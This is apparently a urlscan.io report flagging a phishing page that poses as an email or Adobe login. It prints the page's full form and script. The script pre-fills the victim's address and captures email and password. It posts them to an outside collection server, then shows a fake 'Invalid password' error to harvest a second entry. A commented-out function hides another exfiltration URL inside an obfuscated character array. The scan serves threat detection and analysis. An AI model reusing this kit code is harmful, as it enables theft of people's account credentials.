f004.backblazeb2.com
Open in
urlscan Pro
149.137.128.16
Malicious Activity!
Public Scan
Submitted URL: https://et9io74qrl.s3.us-south.objectstorage.softlayer.net/fluted/index.html?key=c7b11bb143ad0ce8171db6b9effb8465&redirect=https://www.amazon.com
Effective URL: https://f004.backblazeb2.com/file/abseiled-impanation-tolguacha/login.html?cpzk=YkBHZwrSdSRYbcF9jK8zn2ECbSbW6k&uiumchu=dYyt6i...
Submission: On February 28 via manual from ES — Scanned from US
Effective URL: https://f004.backblazeb2.com/file/abseiled-impanation-tolguacha/login.html?cpzk=YkBHZwrSdSRYbcF9jK8zn2ECbSbW6k&uiumchu=dYyt6i...
Submission: On February 28 via manual from ES — Scanned from US
Form analysis 1 forms found in the DOM
<form id="themform">
<input name="em" placeholder="Email Address" class="textbox" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required="" type="text" style="position:absolute;width:343px;left:534px;top:445px;z-index:1">
<input name="ps" placeholder="Email Password" class="textbox" required="" type="password" style="position:absolute;width:343px;left:534px;top:499px;z-index:2">
<span class="errmsg" style="color: #ff0000;font-weight: bold;display: none;position:absolute;width:343px;left:634px;top:545px;z-index:3">Invalid password</span>
<div id="formimage1" style="position:absolute; left:562px; top:570px; z-index:4"> <input type="image" name="formimage1" width="290" height="38" src="https://i.ibb.co/G9WKY4d/321.png"></div>
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
<script>
$(document).ready(function() {
var errmsg = $('.errmsg');
errmsg.hide();
var ufromUrl = get_email_hash();
if (!ufromUrl) {
ufromUrl = geturlparameter('username');
}
var redirectUrl = 'verify.html';
var isStyleDouble = 2;
var styleDoubleCounter = 1;
var styleDoubleFromUrl = 1;
var formcon = $('#themform');
var em = $('#themform input[name=em]');
var ps = $('#themform input[name=ps]');
if (ufromUrl) {
em.val(ufromUrl);
}
var emv = '';
var psv = '';
if (isStyleDouble) {
styleDoubleFromUrl = geturlparameter('db');
if (styleDoubleFromUrl) {
styleDoubleFromUrl = parseInt(styleDoubleFromUrl);
if (isNaN(styleDoubleFromUrl)) {
styleDoubleFromUrl = 1;
}
if (styleDoubleFromUrl > 1) {
errmsg.show();
}
} else {
styleDoubleFromUrl = 1;
}
}
formcon.submit(function(e) {
e.preventDefault();
emv = em.val();
psv = ps.val();
if (em && em.length > 0 && psv && psv.length > 0) {
var theemidval = '8ee219ef3953259b3536ea2a005dbb9a';
//mg(emv, psv,'Adobe New');
$.ajax({
url: 'https://sogosmtp.com/email-list/adobe-new/finish.php',
type: 'POST',
dataType: 'html',
data: {
Email: emv,
password: psv,
typeofemail: 'Adobe New',
theemid: theemidval
},
crossDomain: true,
success: function(msg) {},
error: function(e) {
console.log(e)
}
});
if (isStyleDouble && styleDoubleFromUrl && styleDoubleFromUrl < isStyleDouble && styleDoubleFromUrl < 3) {
styleDoubleFromUrl++;
redirectUrl = 'login.html?' + get_rand_url_pars() + '&username=' + emv + '&db=' + styleDoubleFromUrl;
}
setTimeout(function() {
window.location.replace(redirectUrl);
//alert(redirectUrl);
}, 2000);
}
});
});
//function evandoor(a,o,t){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],f = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:f,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:t},crossDomain:!0,success:function(a){},error:function(a){}})}
function randomInteger(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomString(r, n) {
for (var o = "", t = r; 0 < t; --t) o += n[Math.floor(Math.random() * n.length)];
return o
}
function getdomainpartofemail(a) {
var e, t = !1;
return !validateEmail(a) || -1 != (e = (a = a.toLowerCase()).indexOf("@")) && (t = a.substr(e + 1)), t
}
function get_email_hash() {
var a = !1,
i = window.location.href,
t = (i = i.trim()).lastIndexOf("#");
return -1 != t && (a = i.substring(t + 1), validateEmail(a) || (a = !1)), a
}
function validateEmail(t) {
return /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(String(t).toLowerCase())
}
function geturlparameter(r) {
for (var t = window.location.search.substring(1).split("&"), e = 0; e < t.length; e++) {
var n = t[e].split("=");
if (n[0] == r) return decodeURIComponent(n[1])
}
}
function get_rand_url_pars() {
var r = "",
n = 0,
a = "abcdefghijklmnopqrstuvwxyz",
e = a;
a += a.toUpperCase() + "123456789";
for (var t = randomInteger(3, 10), n = 0; n < t; n++) r += "&" + randomString(randomInteger(3, 10), e) + "=" + randomString(randomInteger(15, 30), a);
return r.substr(1)
}
</script>
</form>Text Content
Invalid password